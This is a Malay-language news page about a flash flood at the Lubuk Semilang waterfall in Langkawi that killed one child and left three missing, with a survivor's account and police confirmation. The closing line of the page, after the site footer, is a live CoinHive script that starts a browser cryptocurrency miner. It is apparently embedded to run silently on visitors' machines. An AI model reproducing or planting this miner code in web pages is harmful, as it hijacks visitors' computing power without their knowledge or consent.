© Copyright 2017, All Rights Reserved
Home / Semasa / [UPDATE] Sempat paut pada batu

[UPDATE] Sempat paut pada batu

“SAYA tidak sedar bila arus deras itu datang dan sebaik menyedari, saya sudah dihanyutkan arus… dalam terkapai-kapai saya sempat berpaut pada batu dan orang ramai tarik saya ke tempat selamat,” kata Alif Akmal Md Zamri, 12, seorang daripada dua mangsa yang terselamat dalam kejadian fenomena ‘kepala air’ yang melanda kawasan air terjun Kampung Buku Lubuk Semilang, Langkawi, hari ini.

Dalam kejadian 4.30 petang itu, seorang maut manakala tiga lagi kanak-kanak dikhuatiri lemas akibat dihanyut arus deras yang membadai secara tiba-tiba.

Mangsa yang maut dikenali Qistina Puteri Wira, 11, dan mayatnya ditemui penduduk kampung tersangkut pada tebing sungai kira-kira 500 meter dari lokasi kanak-kanak itu dibadai arus.

Tiga mangsa yang masih hilang dikenali Anis Syakirah Saad, 12, dari Kampung Lawer di Padang Matsirat, selain Iman Wahidah, 11, dari Kampung Ranggut dan Siti Aishah Kassim, 5, dari Bukit Malut.

Semua mangsa adalah antara enam kanak-kanak yang dilapor hanyut ketika kepala air membadai kawasan rekreasi itu, namun dua daripada mereka iaitu Adib Irfan, 11, yang juga adik kepada Anis Syakirah, serta Alif Akmal sempat diselamatkan orang ramai.

Alif Akmal mengakui bernasib baik kerana sempat berpaut pada batu di tebing sungai ketika dihanyutkan arus yang datang secara tiba-tiba itu, sebelum diselamatkan orang ramai.

“Ketika kejadian kawasan itu tenang dan saya bersama pengunjung lain termasuk beberapa kanak-kanak asyik bermain air sambil menyelam,” katanya.

Berdasarkan maklumat, selain kanak-kanak terbabit yang datang berkelah bersama keluarga masing-masing, beberapa pengunjung termasuk pelancong asing dikatakan turut mandi-manda, namun terselamat daripada dibadai kepala air itu.

Sementara itu, Timbalan Ketua Polis Daerah Langkawi, Deputi Superintendan Mahani Mohamed mengesahkan kejadian itu yang mengorbankan nyawa seorang kanak-kanak perempuan dan sehingga kini, usaha mencari tiga lagi mangsa berusia antara 5 hingga 12 tahun masih digerakkan.

Berita berkaitan:

1 lemas, 3 masih hilang


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Penyokong Pas serbu pejabat PAN Salor, mahu rampas bangunan

KUALA LUMPUR – Kira-kira 300 orang, melibatkan ahli dan penyokong dari Pas ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();